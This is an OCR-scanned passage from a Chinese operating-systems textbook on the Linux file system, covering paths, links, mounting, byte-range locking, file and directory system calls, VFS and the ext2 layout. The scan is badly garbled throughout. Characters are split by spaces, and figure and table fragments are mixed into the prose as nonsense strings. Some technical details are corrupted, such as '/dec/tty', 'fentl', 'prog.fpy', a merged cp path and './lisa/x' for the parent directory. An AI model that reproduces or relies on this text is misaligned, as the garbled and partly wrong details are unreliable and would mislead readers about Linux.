MULTICS ， 虽 然 有 很 多 已 经 被 MS-DOS、Windows 和 其 他 操作 系统 使 用 过 了 ， 但 是 其 他 的 都 是 UNIX 类 
操作 系统 特有 的 。Linux 的 设计 非常 有 意思 ， 因 为 它 忠 实地 秉承 了 “小 的 就 是 美好 的 ”(Small is 
Beautiful) 的 设计 原则 。 虽 然 只 是 使 用 了 最 简 的 机 制 和 少量 的 系统 调用 ， 但 是 Linux 却 提供 了 强大 而 优 
美的 文件 系统 。 


10.6.1 基本 概念 

最 初 的 Linux 文 件 系统 是 MINIX 1 文件 系统 。 但 由 于 它 只 能 支持 14 字 节 的 文件 名 (为 了 和 UNIX 
Version 7 兼容 ) 和 最 大 64MB 的 文件 (这 在 只 有 10MB 硬 盘 的 年 代 是 足够 强大 的 ) ， 在 Linux 刚 被 开发 出 来 
的 时 候 ， 开 发 者 就 意识 到 需要 开发 更 好 的 文件 系统 (开始 于 MINIX 1 发 布 的 5 年 后 ) 。 对 MINIX 1 文件 系 
统 进 行 第 一 次 改进 后 的 文件 系统 是 ext 文 件 系统 。ext 文 件 系统 能 支持 255 个 字符 的 文件 名 和 2GB 的 文件 大 
小 ， 但 是 它 的 速度 比 MINIX 1 慢 ， 所 以 仍然 有 必要 对 它 进 行 改进 。 最 终 ，ext2 文 件 系统 被 开发 出 来 ， 它 
能 够 支持 长 文件 名 和 大 文件 ， 并 且 具 有 更 好 的 性 能 ， 这 使 得 它 成 为 了 Linux 主 要 的 文件 系统 。 不 过 ， 
Linux 使 用 虚拟 文件 系统 (VFS) 层 支 持 很 多 类 型 的 文件 系统 (VFS 将 在 下 文 介绍 )。 在 Linux 链 接 时 ， 用 
户 可 以 选择 要 构造 到 内 核 中 的 文件 系统 。 如 果 需 要 其 他 文件 系统 ， 可 以 在 运行 时 作为 模块 动态 加 载 。 

Linux 中 的 文件 是 一 个 长 度 为 0 个 或 多 个 字 节 的 序列 ， 可 以 包含 任意 的 信息 。ASCII 文 件 、 二 进 制 文 
件 和 其 他 类 型 的 文件 是 不 加 区 别 的 。 文 件 中 各 个 位 的 含义 完全 由 文件 所 有 者 确定 ， 而 文件 系统 不 会 关心 。 
文件 名 长 度 限制 在 255 个 字符 内 ， 可 以 由 除了 NUL 以 外 的 所 有 ASCII 字 符 构 成 ， 也 就 是 说 ， 一 个 包含 了 三 
个 回 车 符 的 文件 名 也 是 合法 的 (但 是 这 样 命名 并 不 是 很 方便 )。 

按照 惯例 ， 许 多 程序 能 识别 的 文件 包含 一 个 基本 文件 名 和 一 个 扩展 名 ， 中 间 用 一 个 点 连接 (点 也 被 
认为 是 占用 了 文件 名 的 一 个 字符 ) 。 例 如 一 个 名 为 prog.c 的 文件 是 一 个 典型 的 C 源 文件 ，prog.fpy 是 一 个 
典型 的 Python 程序 文件 ， 而 prog.o 通 常 是 一 个 object 文 件 〈 编 译 器 的 输出 文件 ) 。 这 个 惯例 不 是 操作 系统 
要 求 的， 但 是 一 些 编译 器 和 程序 希望 是 这 样 ， 比 如 一 个 名 为 prog.java.gz 的 文件 可 能 是 一 个 gzip 压 缩 的 
Java 程 序 。 

为 了 方便 ,文件 可 以 被 组 织 在 一 个 目录 里 。 目 录 存 储 成 文件 的 形式 并 且 在 很 大 程度 上 可 以 作为 文件 
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处 理 。 目 录 可 以 包含 子 目录 ， 这 样 可 以 形成 有 层次 的 文件 系统 。 根 目录 表示 为 “/”"， 它 通常 包含 了 多 个 


子 目录 。 字 符 “/” 还 用 于 分 离 目录 名 ， 所 以 /usr/ast/x 实 
A 
际 上 是 说 文件 x 位 于 目录 ast 中 ， 而 目录 ast 位 于 /usr 目 录 


| bin | ”三 进 制 (可 执行 ) 文件 


中 。 表 10-23 列 举 了 根 目录 下 几 个 主要 的 目录 及 其 内 容 。 


a eee ee A a 
序 来 说 ， 都 有 两 种 方法 表示 一 个 文件 的 文件 名 。 第 一 | mb | iE 


OO O E | 

种 方法 是 使 用 绝对 路 径 ， 绝 对 路 径 告诉 系统 如 何 从 根 | usr | ”用户 和 录 | 
目录 开始 查找 一 个 文件 。 例 如 /usr/ast/books/ 
mos4/chap-10， 这 个 路 径 名 告诉 系统 在 根 目录 里 寻找 一 图 10-23 大 部 分 Linux 系 统 中 一 些 重要 的 目录 
个 叫 usr 的 目录 ， 然 后 再 从 usr 中 寻找 ast 目 录 …… 依 照 这 种 方式 ， 最 终 找到 chap-10 文 件 。 

绝对 路 径 的 缺点 是 文件 名 太 长 并 且 不 方便 。 因 为 这 个 原因 ，Linux 允 许 用 户 和 进程 把 他 们 当前 工作 
的 目录 标识 为 工作 目录 , 这样 路 径 名 就 可 以 相对 于 工作 目录 命名 , 这 种 方式 命名 的 目录 名 叫 作 相对 路 径 。 
例如 ， 如 果 /usr/ast/books/mos4 是 工作 目录 ， 那 么 shell 命 令 

cp chap-10 backup-10 


和 长 命令 

cp /usr/ast/books/mos4/chap-10/usr/ast/books/mos4/ backup-10 
的 效果 是 一 样 的 。 

一 个 用 户 要 使 用 属于 另 一 个 用 户 的 文件 或 者 使 用 文件 树 结构 里 的 某 个 文件 的 情况 是 经 常 发 生 的 。 例 
如 ， 两 个 用 户 共享 一 个 文件 ， 这 个 文件 位 于 其 中 某 个 用 户 所 拥有 的 目录 中 ， 另 一 个 用 户 需要 使 用 这 个 文 
件 时 ， 必 须 通过 绝对 路 径 才 能 引用 它 (或 者 通过 改 
变 工 作 目 录 的 方式 )。 如 果 绝 对 路 径 名 很 长 ， 那 么 
每 次 输入 时 将 会 很 麻烦 。 为 了 解决 这 个 问题 ， 
Linux 提 供 了 一 种 指向 已 存在 文件 的 目录 项 ， 称 作 
链接 (link), 

以 图 10-24a 为 例 ， 两 个 用 户 Fred 和 Lisa 一 起 工 fed fred 


lisa lisa 
作 来 完成 一 个 项 目 ， 他 们 需要 访问 对 方 的 文件 。 x Faa x 
如 果 Fred 的 工作 目录 是 /usr/fred， 他 可 以 使 用 y z 
/usr/lisa/x 来 访问 Lisa 目 录 下 的 文件 x*。Fred 也 可 以 
a) b) 








如 图 10-24b 所 示 的 方法 ， 在 自己 目录 下 创建 一 个 
链接 ， 然 后 他 就 可 以 用 x 来 代替 /usr/lisa/x 了 。 

在 上 面 的 例子 中 ， 我 们 说 在 创建 链接 之 前 ， 图 10-24 a) 链接 前 ，b) 链接 后 
Fred 引 用 Lisa 的 文件 x 的 唯一 方法 是 使 用 绝对 路 径 。 实 际 上 这 并 不 正确 ， 当 一 个 目录 被 创建 出 来 时 ， 有 两 
个 目录 项 “.” 和 “..” 被 自动 创建 出 来 存放 在 该 目录 中 ， 前 者 代表 工作 目录 自身 ， 而 后 者 表示 该 目录 的 
父 目录 ， 也 就 是 该 目录 所 在 的 目录 。 这 样 一 来 ， 在 /usr/fred 目 录 中 访问 Lisa 的 文件 x 的 另 一 个 路 径 
是 : ./lisa/x, 

除了 普通 的 文件 之 外 ，Linux 还 支持 字符 特殊 文件 和 块 特殊 文件 。 字 符 特殊 文件 用 来 建 模 串 行 1O 设 
备 ， 比 如 键盘 和 打印 机 。 如 果 打开 并 从 /dec/tty 中 读 取 内 容 ， 等 于 从 键盘 读 取 内 容 ， 而 如 果 打 开 并 向 
/dev/lp 中 写 内 容 ， 等 于 向 打印 机 输出 内 容 。 块 特殊 文件 通常 有 类 似 于 /dev/hd1 的 文件 名 ， 它 用 来 直接 向 
硬盘 分 区 中 读 取 和 写 和 内容， 而 不 需要 考虑 文件 系统 。 一 个 偏 移 为 / 字 节 的 read 操 作 ， 将 会 从 相应 分 区 开 
始 的 第 /个 字 节 开始 读 取 ， 而 完全 忽略 i 节 点 和 文件 的 结构 。 原 始 块 设备 常 被 一 些 建立 (如 mkfs) 或 修补 
(如 fsck) 文件 系统 的 程序 用 来 进行 分 页 和 交换 。 

许多 计算 机 有 两 块 或 更 多 的 磁盘 。 银 行使 用 的 大 型 机 ， 为 了 存储 大 量 的 数据 ， 通 常 需要 在 一 台 机 器 
上 安装 100 个 或 更 多 的 磁盘 。 甚 至 在 PC 上 也 至 少 有 两 块 磁盘 一块 硬盘 和 一 个 光盘 驱动 器 (如 DVD)。 
当 一 台 机 器 上 安装 了 多 个 磁盘 的 时 候 ， 就 产生 了 如 何 处 理 它们 的 问题 。 

一 个 解决 方法 是 在 每 一 个 磁盘 上 安装 自 包含 的 文件 系统 ， 使 它们 之 间 互 相 独 立 。 考 虑 如 图 10-25a 所 
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示 的 解决 方法 ， 有 一 个 硬盘 C: 和 一 个 DVD D:， 它 们 都 有 自己 的 根 目 录 和 文件 。 如 果 使 用 这 种 解决 方法 ， 
除了 默认 盘 外 ， 使 用 者 必须 指定 设备 和 文件 ， 例 
如 ， 要 把 文件 x 复制 到 目录 d 中 (假设 C: 是 默认 盘 )， 
应 该 使 用 命令 a a m 

cp D:/x /a/d/x GOO 


这 种 方法 被 许多 操作 系统 使 用 ， 包 括 Windows 8 

(是 从 上 个 世纪 的 MS-DOS 继 承 的 ) 。 SOD 
Linux 的 解决 方法 是 允许 一 个 磁盘 挂 载 到 另 一 [| | [e] E] 

个 磁盘 的 目录 树 上 ， 比 如 ， 我 们 可 以 把 DVD 挂 载 在 

目录 /b 上 ， 构 成 如 图 10-25b 所 示 的 文件 系统 。 挂 载 OO O 00 © 

之 后 ， 用 户 能 够 看 见 一 个 目录 树 ， 而 不 再 需要 关心 

文件 在 哪个 设备 上 ， 上 面 提 到 的 命令 就 可 以 变 成 EN EA AA SE 
cp /b/x /a/d/x 


和 所 有 文件 都 在 硬盘 上 是 一 样 的 。 

Linux 文 件 系统 的 另 一 个 有 趣 的 性 质 是 加 锁 (locking)。 在 一 些 应 用 中 会 出 现 两 个 或 更 多 的 进程 同时 
使 用 同一 个 文件 的 情况 ， 可 能 导致 竞争 条 件 (race condition)。 有 一 种 解决 方法 是 使 用 临界 区 ， 但 是 如 
果 这 些 进程 属于 相互 不 认识 的 独立 的 用 户 ， 这 种 解决 方法 是 不 方便 的 。 

考虑 这 样 的 一 个 例子 ， 一 个 数据 库 组 织 许多 文件 在 一 个 或 多 个 目录 中 ， 它 们 可 以 被 不 相关 的 用 户 访 
间 。 可 以 通过 设置 信号 量 来 解决 互 斥 的 问题 ， 在 每 个 目录 或 文件 上 设置 一 个 信号 量 ， 当 程序 需要 访问 相 
应 的 数据 时 ， 在 相应 的 信号 量 上 做 一 个 down 操 作 。 但 这 样 做 的 缺点 是 ， 尽 管 进程 只 需要 访问 一 条 记录 ， 
信号 量 却 使 得 整个 目录 或 文件 都 不 能 访问 。 

由 于 这 种 原因 ，POSIX 提 供 了 一 种 灵活 的 、 细 粒度 的 机 制 ， 允 许 一 个 进程 使 用 一 个 不 可 分 割 的 操作 对 
小 到 一 个 字 节 、 大 到 整个 文件 加 锁 。 加 锁 机 制 要 求 加 锁 者 标识 要 加 锁 的 文件 、 开 始 位 置 以 及 要 加 锁 的 字 节 
数 。 如 果 操 作成 功 ， 系 统 会 在 表格 中 添加 记录 说 明 要 求 加 锁 的 字 节 (如 数据 库 的 一 条 记录 ) 已 被 锁 住 。 

系统 提供 了 两 种 锁 : 共享 锁 和 互 斥 锁 。 如 果 文 件 的 一 部 分 已 经 被 加 了 共享 锁 ， 那 么 在 上 面 尝试 加 共 
享 锁 是 允许 的 ， 但 是 加 互 斥 锁 是 不 会 成 功 的 ;如 果 文 件 的 一 部 分 已 经 被 加 了 互 斥 锁 ， 那 么 在 互 斥 锁 解 除 
之 前 加 任何 锁 都 不 会 成 功 。 为 了 成 功 地 加 锁 ， 请 求 加 锁 的 部 分 的 所 有 字 节 都 必须 是 可 用 的 。 

在 加 锁 时 ， 进 程 必 须 指出 当 加 锁 不 成 功 时 是 否 阻塞 。 如 果 选 择 阻塞 ， 则 当 已 经 存在 的 锁 被 删除 时 ， 
进程 被 放行 并 在 文件 上 加 锁 ， 如 果 选 择 不 阻塞 ， 系 统 调 用 在 加 锁 失 败 时 立即 返回 ， 并 设置 状态 码 表明 加 
锁 是 否 成 功 ， 如 果 不 成 功 ， 由 调用 者 决定 下 一 步 动作 (比如 ， 等 待 或 者 继续 尝试 ) 。 

加 锁 区 域 可 以 是 重 登 的。 如 图 10-26a 所 示 ， 进 程 A 在 第 4 字 节 到 第 7 字 节 的 区 域 加 了 共享 锁 ， 之 后 ， 


硬盘 DVD 硬盘 


进程 A 的 共享 锁 





C 的 共享 锁 
图 10-26 a) 加 了 一 个 锁 的 文件 ，b) 增加 了 第 二 个 锁 ，c) 增加 了 第 三 个 锁 
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进程 B 在 第 6 字 节 到 第 9 字 节 加 了 共享 锁 ， 如 图 10-26b 所 示 ， 最 后 ， 进 程 C 在 第 2 字 节 到 第 11 字 节 加 了 共享 
锁 。 由 于 这 些 锁 都 是 共享 锁 ， 是 可 以 同时 存在 的 。 

此 时 ， 如 果 一 个 进程 试图 在 图 10-26c 中 文件 的 第 9 个 字 节 加 互 斥 锁 ， 并 设置 加 锁 失 败 时 阻塞 ， 那 么 
会 发 生 什 么 ?由 于 该 区 域 已 经 被 进程 B 和 进程 C 两 个 进程 加 锁 ， 这 个 进程 将 会 被 阻塞 ， 直 到 进程 B 和 进程 
C 释 放 它 们 的 锁 为 止 。 


10.6.2 Linux 中 的 文件 系统 调用 

许多 系统 调用 与 文件 和 文件 系统 有 关 。 在 本 节 中 ， 首 先 研 究 对 单个 文件 进行 操作 的 系统 调用 ， 之 后 
我 们 会 研究 针对 目录 和 文件 系统 的 系统 调用 。 要 创建 一 个 文件 时 ， 可 以 使 用 creat 系 统 调用 。( 曾 经 有 人 
问 Ken Thompson， 如 果 给 他 一 次 重新 发 明 UNIX 的 机 会 ， 他 会 做 什么 不 同事 情 ， 他 回答 说 他 要 把 这 个 系 
统 调用 的 拼写 改 成 create ， 而 不 是 现在 的 creat。) 这 个 系统 调用 的 参数 是 文件 名 和 保护 模式 。 于 是 ， 


fd = creat("abc", mode); 


创建 了 一 个 名 为 abc 的 文件 ， 并 根据 mode 设 置 文件 的 保护 位 。 这 些 保护 位 决定 了 用 户 访问 文件 的 权限 及 
方式 。 在 下 文 将 会 具体 讨论 。 

creat 系 统 调用 不 仅 创 建 了 一 个 新 文件 ， 还 以 写 的 方式 打开 了 这 个 文件 。 为 了 使 以 后 的 系统 调用 能 
够 访问 这 个 文件 ，creat 成 功 时 返回 一 个 非 负 整 数 ， 这 个 非 负 整数 叫 作 文件 描述 符 ， 也 就 是 例子 中 的 fd。 
如 果 creat 作 用 在 一 个 已 经 存在 的 文件 上 ， 那 么 该 文件 的 文件 长 度 会 被 截 短 为 0， 它 的 内 容 会 被 丢弃 。 通 
过 设置 合适 的 参数 ，open 系 统 调用 也 能 创建 文件 。 

现在 我 们 继续 讨论 图 10-27 列 出 的 主要 的 文件 系统 调用 。 为 了 读 或 写 一 个 已 经 存在 的 文件 ， 必 须 使 
用 系统 调用 open 或 creat 打 开 这 个 文件 。 它 的 参数 是 要 打开 文件 的 文件 名 以 及 打开 方式 : 只 读 、 只 写 或 
可 读 可 写 。 此 外 ， 也 可 以 指定 不 同 的 选项 。 和 creat 一 样 ，open 返 回 一 个 文件 描述 符 ， 可 用 来 进行 读 写 。 
然后 可 以 使 用 close 系 统 调用 来 关闭 文件 ， 它 使 得 文件 描述 符 可 以 被 后 来 的 creat 或 open 使 用 。creat 和 
open 系 统 调用 总 是 返回 未 被 使 用 的 最 小 数值 的 文件 描述 符 。 

当 一 个 程序 以 标准 方式 运行 时 ， 文 件 描述 符 0、1、2 已 经 分 别 用 于 标准 输入 、 标 准 输出 和 标准 错误 。 
通过 这 种 方式 ， 一 个 过 滤器 ， 比 如 sort 程 序 ， 可 以 从 文件 描述 符 0 读 取 输 入 ， 输 出 到 文件 描述 符 1， 而 不 
需要 关心 这 些 文件 是 什么 。 这 种 机 制 能 够 有 效 是 因为 shell 在 程序 启动 之 前 就 设置 好 了 它们 的 值 。 

毫 无 疑问 ， 最 常 使 用 的 文件 系统 调用 是 read 和 write。 它 们 每 个 都 有 三 个 参数 : 文件 描述 符 (标明 
要 读 写 的 文件 )、 缓 冲 区 地 址 (给 出 数据 存放 的 位 置 或 者 读 取 数 据 的 位 置 ) ， 长 度 (给 出 要 传输 的 数据 的 
字 节 数 )。 这 些 就 是 全 部 了 。 这 种 设计 非常 简单 ， 一 个 典型 的 调用 方法 是 : 

n = read(fd, buffer, nbytes); 











系统 调用 描述 
= creat(name,mode) 创建 新 文件 的 一 种 方法 
fd = open(file,how,…) 打开 文件 读 、 写 或 者 读 写 | 





s = close(fd) 


关闭 一 个 已 经 打开 的 文件 





n = read(fd, buffer, nbytes) 





从 文件 中 读 取 数据 到 一 个 缓冲 区 





n = write(fd, buffer, nbytes) 


把 数据 从 缓冲 区 写 到 文件 





position = lseek(fd, offset, whence) 


移动 文件 指针 





s = stat(name, &buf) 


获取 一 个 文件 的 状态 信息 





s = fstat(fd, &buf) 


获取 一 个 文件 的 状态 信息 





s = pipe(&fd[0]) 


创建 一 个 管道 








s = fentl(fd, cmd,---) 





件 加 锁 及 其 他 操作 





图 10-27 跟 文件 相关 的 一 些 系 统 调用 。 如 果 发 生 错误 ， 那 么 返回 值 s 是 -1， fd 是 一 个 文件 描述 符 ， 
position 是 文件 偏 移 。 参 数 的 含义 是 很 清楚 的 


虽然 几乎 所 有 程序 都 是 顺序 读 写 文件 的 ,但 是 一 些 程序 需要 能 够 从 文件 的 任何 位 置 随机 地 读 写 文件 。 
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每 个 文件 都 有 一 个 指针 指向 文件 当前 的 读 写 位 置 。 当 顺序 地 读 写 文件 时 ,这 个 指针 指向 将 要 读 写 的 字 节 。 
如 果 文 件 位 置 指针 最 初 指向 4096， 在 读 取 了 1024 个 字 节 后 ， 它 会 自动 地 指向 第 5120 个 字 节 。lseek 系 统 
调用 可 以 改变 位 置 指针 的 值 ， 所 以 之 后 的 read 和 write 可 以 从 文件 的 任何 位 置 开 始 读 写 ， 甚 至 是 超出 文件 
的 结尾 。 这 个 系统 调用 叫 作 lseek， 是 为 了 避免 与 seek 冲 突 ， 其 中 后 者 以 前 在 16 位 计算 机 上 用 于 查找 ， 
现在 已 经 不 使 用 了 。 

lseek 有 三 个 参数 : 第 一 个 是 文件 描述 符 ， 第 二 个 是 文件 读 写 位 置 ， 第 三 个 表明 读 写 位 置 是 相对 于 
文件 开头 、 当 前 位 置 还 是 文件 尾 。lseek 的 返回 值 是 当 读 写 位 置 改变 后 的 绝对 位 置 。 有 点 讽刺 的 是 ， 
lseek 是 唯一 一 个 从 不 会 引起 实际 的 磁盘 寻 道 的 文件 系统 调用 ， 因 为 它 所 做 的 只 是 修改 了 内 存 中 的 一 个 
值 (文件 读 写 位 置 ) 。 

对 于 每 个 文件 ，Linux 记 录 了 它 的 文件 类 型 (普通 文件 、 目 录 、 特 殊 文件 )、 大 小 、 最 后 一 次 修改 时 
间 和 其 他 信息 。 程 序 可 以 使 用 stat 系 





























统 调 用 来 查看 这 些 信 息 ，stat 的 第 一 存储 文件 的 设备 | 
个 参数 是 文件 名 ， 第 二 个 参数 是 指向 i 节点 号 (哪个 文件 在 设备 上 ) 
获取 的 文件 信息 将 要 存放 的 结构 的 指 文件 模式 《包括 保护 信息 ) 
针 ， 该 结构 的 各 个 域 如 图 10-28 所 示 。 指向 文件 的 连接 数 
系统 调用 fstat 的 作用 和 stat 一 样 ， 唯 文件 所 有 者 的 标识 
一 不 同 的 是 ，fstat 针 对 一 个 打开 的 文 eats ae 
件 (文件 名 可 能 未 知 ) 进行 操作 ， 而 文件 大 小 (单位 是 字 节 ) 
不 是 一 个 路 径 名 。 创建 时 间 

pipe 系 统 调用 用 来 创建 一 个 shell 最 近 访问 的 时 间 

ve 最 近 修改 的 时 间 














管线 。 它 创建 了 一 种 伪 文 件 (pseudo- 
file) ， 用 于 缓冲 管线 通信 的 数据 ， 并 图 10-28 stat 系统 调 用 返回 的 域 
给 缓冲 区 的 读 写 都 返回 文件 描述 符 。 以 下 面 的 管线 为 例 : 

sort <in | head —30 


在 执行 sort 的 进程 中 ， 文 件 描述 符 1 (标准 输出 ) 被 设置 为 写 人 管道 ， 执 行 head 的 进程 中 ， 文 件 描述 
符 0 (标准 输入 ) 被 设置 为 从 管道 读 取 。 通 过 这 种 方式 ，sort 只 是 从 文件 描述 符 0 (被 设置 为 文件 in) 读 取 ， 
写 入 到 文件 描述 符 1 (管道 )， 其 至 不 会 觉察 到 它们 已 经 被 重 定 向 了 。 如 果 它 们 没有 被 重 定向 ，sort 将 会 
自动 从 键盘 读 取 数 据 ， 而 后 输出 到 显示 器 (默认 设备 ) 。 同 样 地 ， 当 head 从 文件 描述 符 0 中 读 取 数 据 时 ， 
它 读 取 到 的 是 sort 写 人 到 管道 缓冲 区 中 的 数据 ，head 甚 至 不 知道 自己 使 用 了 管道 。 这 个 例子 清晰 地 表明 了 
如 何 使 用 一 个 简单 的 概念 〈 重 定向 ) 和 一 个 简单 的 实现 (文件 描述 符 0 和 1) 来 实现 一 个 强大 的 工具 (以 
任意 方式 连接 程序 ， 而 不 需要 去 修改 它们 ) 。 

图 10-27 列 举 的 最 后 一 个 系统 调 















































用 是 fcntl。fcntl 用 于 加 锁 和 解锁 文件 ， 系统 调用 描述 
应 用 共享 锁 和 互 斥 锁 ， 或 者 是 执行 一 s=mkdir (path, mode) | 建立 新 目录 二 了 
些 文件 相关 的 其 他 操作 。 s=rmdir (path) | MIRE 

现在 我 们 开始 关注 与 目录 及 文件 s=link (oldpath, newpath) | 创建 指向 已 有 文件 的 链接 
系统 整体 更 加 相关 ， 而 不 是 仅 和 单个 | s=unlink (path) 取消 文件 的 链接 
文件 有 关 的 系统 调用 ， 图 10-29 列 举 了 | 5=chdir (path) 改变 工作 目录 | 
一 些 这 样 的 系统 调用 。 可 以 使 用 mkdir dir=opendir (path) | 打开 目录 

di ， 但 s=closedir (dir) 关闭 目录 
只 pent ote hit rewinddir (dir) 回转 目录 使 其 再 次 被 读 取 

x] * 2s sng BIA. 

已 有 文件 的 链接 时 创建 了 一 个 目录 项 ”图 10-29 与 目录 相关 的 一 些 系 统 调 用 。 如 果 发 生 错误 MBA 
(directory entry)。 系 统 调用 link 用 于 返回 值 s 是 一 1，dir 是 一 个 目录 流 ，dirent 是 一 个 目录 项 。 


创建 链接 ， 它 的 参数 是 已 有 文件 的 文 参数 的 含义 是 自 解释 的 
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件 名 和 链接 的 名 称 ， 使 用 unlink 可 以 删除 目录 项 。 当 文件 的 最 后 一 个 链接 被 删除 时 ， 这 个 文件 会 被 自动 
删除 。 对 于 一 个 没有 被 链接 的 文件 ， 对 其 使 用 unlink 也 会 让 它 从 目录 中 消失 。 

使 用 chdir 系 统 调用 可 以 改变 工作 目录 ， 工 作 目 录 的 改变 会 影响 到 相对 路 径 名 的 解释 。 

图 10-29 给 出 的 最 后 四 个 系统 调用 是 用 于 读 取 目 录 的 。 和 普通 文件 类 似 ， 它 们 可 被 打开 、 关 闭 和 读 取 。 
每 次 调用 readdir 都 会 以 固定 的 格式 返回 一 个 目录 项 。 用 户 不 能 对 目录 执行 写 操 作 (为 了 保证 文件 系统 的 完 
整 性 )， 但 可 以 使 用 creat 或 link 在 文件 夹 中 创建 一 个 目录 ， 或 使 用 unlink 删 除 一 个 目录 。 同 样 地 ， 用 户 不 能 
在 目录 中 查找 某 个 特定 文件 ， 但 是 可 以 使 用 rewinddir 作 用 于 一 个 打开 的 目录 ， 使 得 它 能 再 次 从 头 读 取 。 


10.6.3 Linux 文 件 系统 的 实现 

在 本 节 中 ， 我 们 首先 研究 虚拟 文件 系统 (Virtual File System, VFS) 层 支 持 的 抽象 。VFS 对 高 层 进 
程 和 应 用 程序 隐藏 了 Linux 支 持 的 所 有 文件 系统 之 间 的 区 别 ， 以 及 文件 系统 是 存储 在 本 地 设备 ， 还 是 需 
要 通过 网 络 访问 的 远程 设备 。 设 备 和 其 他 特殊 文件 也 可 以 通过 VFS 访 问 。 接 下 来 ， 我 们 将 描述 第 一 个 被 
Linux 广 泛 使 用 的 文件 系统 ext2 (second extended file system) 。 随 后 ， 我 们 将 讨论 ext4 文 件 系统 中 所 作 的 
改进 。 所 有 的 Linux 都 能 处 理 有 多 个 磁盘 分 区 且 每 个 分 区 上 有 一 个 不 同文 件 系 统 的 情况 。 

1. Linux 虚拟 文件 系统 

为 了 使 应 用 程序 能 够 与 在 本 地 或 远程 设备 上 的 不 同文 件 系统 进行 交互 ，Linux 采 用 了 一 个 和 其 他 
UNIX 系 统 相同 的 方法 : 虚拟 文件 系统 。VFS 定 义 了 一 个 基本 的 文件 系统 抽象 以 及 这 些 抽 象 上 允许 的 操 
作 和 集合 。 调 用 上 节 中 提 到 的 系统 调用 访问 VFS 的 数据 结构 ， 确 定 要 访问 的 文件 所 属 的 文件 系统 ， 然 后 通 
过 存储 在 VFS 数 据 结构 中 的 函数 指针 调用 该 文件 系统 的 相应 操作 。 

图 10-30 总 结 了 VFS 支 持 的 四 个 主要 的 文件 系统 结构 。 其 中 ， 超 级 块 包含 了 文件 系统 布局 的 重要 信 
息 ， 破 坏 了 超级 块 将 会 导致 文件 系统 不 可 读 。 每 个 i 节 点 (i-node, index-node 的 简写 ， 但 是 从 来 不 这 样 称 
呼 它 ， 而 一 些 人 省 略 了 “-” 并 称 之 为 
inode) 表示 某 个 确切 的 文件 。 值 得 注意 
的 是 ， 在 Linux 中 目录 和 设备 也 被 当 作文 
件 ， 所 以 它们 也 有 自己 对 应 的 ;节点 。 超 





级 志和 i 御 点 都 有 相应 的 结构 ， 由 文件 系 。 |5noe [Penze + sompared. ae 
统 所 在 的 物理 磁盘 维 护 ， Fie | me | 


为 了 便于 目录 操作 及 路 径 (比如 
/usr/ast/bin) 的 遍历 ，VFS 支 持 dentry 数 图 10-30 VFS 支 持 的 文件 系统 抽象 
据 结 构 ， 它 表示 一 个 目录 项 。 这 个 数据 结构 由 文件 系统 在 运行 过 程 中 创建 。 目 录 项 被 缓存 在 
dentry_cache 中 ， 比 如 ，dentry_cache 会 包含 /，/usr，/usr/ast 的 目录 项 。 如 果 多 个 进程 通过 同一 个 硬 连 接 
( 即 相同 路 径 ) 访问 同一 个 文件 ， 它 们 的 文件 对 象 都 会 指向 这 个 cache 中 的 同一 个 目录 项 。 

file 数 据 结构 是 一 个 打开 文件 在 内 存 中 的 表示 ， 并 且 在 调用 open 系 统 调 用 时 被 创建 。 它 支持 read、 
write、sendfile、lock 等 上 一 节 中 提 到 的 系统 调用 。 

在 VFS 下 层 实现 的 实际 文件 系统 并 不 需要 在 内 部 使 用 与 VFS 完 全 相同 的 抽象 和 操作 ， 但 是 必须 实现 
跟 VFS 对 象 所 指定 的 操作 在 语义 上 等 价 的 文件 系统 操作 。 这 四 个 VFS 对 象 中 的 operations 数 据 结 构 的 元 素 
都 是 指向 底层 文件 系统 函数 的 指针 。 

2. Linux ext2 文件 系统 

接 下 来 ， 我 们 介绍 在 Linux 中 最 流行 的 磁盘 文件 系统 : ext2。 第 一 个 Linux 操 作 系 统 使 用 MINIX 文 件 
系统 ， 但 是 它 限 制 了 文件 名 长 度 并 且 文 件 长 度 最 大 只 能 是 64MB 。 后 来 MINIX 被 第 一 代 扩 展 文件 系统 ext 
文件 系统 取代 。ext 可 以 支持 长 文件 名 和 大 文件 ， 但 由 于 它 的 效率 问题 ，ext 被 ext2 代 替 ，ext2 在 今天 还 在 
广泛 使 用 。 

ext2 的 磁盘 分 区 包含 了 一 个 如 图 10-31 所 示 的 文件 系统 。 块 0 不 被 Linux 使 用 ， 而 通常 用 来 存放 启动 
计算 机 的 代码 。 在 块 0 后 面 ， 磁 盘 分 区 被 划分 为 若干 个 块 组 ， 划 分 时 不 考虑 磁盘 的 物理 结构 。 每 个 块 组 
的 结构 如 下 : 

第 一 个 块 是 超级 块 ， 它 包含 了 该 文件 系统 的 信息 ， 包 括 i 节 点 的 个 数 、 磁 盘 块 数 以 及 空闲 块 链表 的 
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起 始 位 置 (通常 有 儿 百 个 项 )。 下 一 个 是 组 描述 符 ， 存放 了 位 图 (bitmap) 的 位 置 、 空 闲 块 数 、 组 中 的 i 
节点 数 ， 以 及 组 中 目录 数 等 信息 ， 这 个 信息 很 重要 ， 因 为 ext2 试 图 把 目录 均匀 地 分 散 存储 到 磁盘 上 。 


alee IK IET, 
四 组 描 iTA 
述 符 位 图 


图 10-31 Linux ext2 文 件 系统 的 磁盘 布局 


两 个 位 图 分 别 记 录 空 闲 块 和 空闲 i 节 点 ， 这 是 从 MINIXI1 文 件 系 统 继承 的 (大 多 数 UNIX 文 件 系 统 不 
使 用 位 图 ， 而 使 用 空闲 列表 ) 。 每 一 个 位 图 的 大 小 是 一 个 块 。 如 果 一 个 块 大 小 是 1IKB ， 那 么 就 限制 了 块 
数 和 i 节 点 数 只 能 是 8192 个 。 块 数 是 一 个 严格 的 限制 ， 但 是 在 实际 应 用 中 ，i 节 点 数 并 不 是 。 如 果 一 个 块 
的 大 小 是 4KB， 那 么 i 节点 数量 是 4 倍 多 。 

在 超级 块 之 后 是 i 节点 存储 区 域 ， 它 们 被 编号 为 1 到 某 个 最 大 值 。 每 个 节点 的 大 小 是 128 字 节 ， 并且 

一 个 节点 恰好 描述 一 个 文件 。i 节 点 包含 了 统计 信息 (包含 了 stat 系 统 调用 能 获得 的 所 有 信息 ， 实 际 上 
stat 就 是 从 i 节点 读 取 信息 的 )， 也 包含 了 所 有 存放 该 文件 数据 的 磁盘 块 的 位 置 。 

在 i 节 点 区 后 面 是 数据 块 区 ， 所 有 文件 和 目录 都 存放 在 这 个 区 域 。 对 于 一 个 包含 了 一 个 以 上 磁盘 块 
的 文件 和 目录 ， 这 些 磁 盘 块 是 不 需要 连续 的 。 实 际 上 ， 一 个 大 文件 的 块 有 可 能 遍布 在 整个 磁盘 上 。 

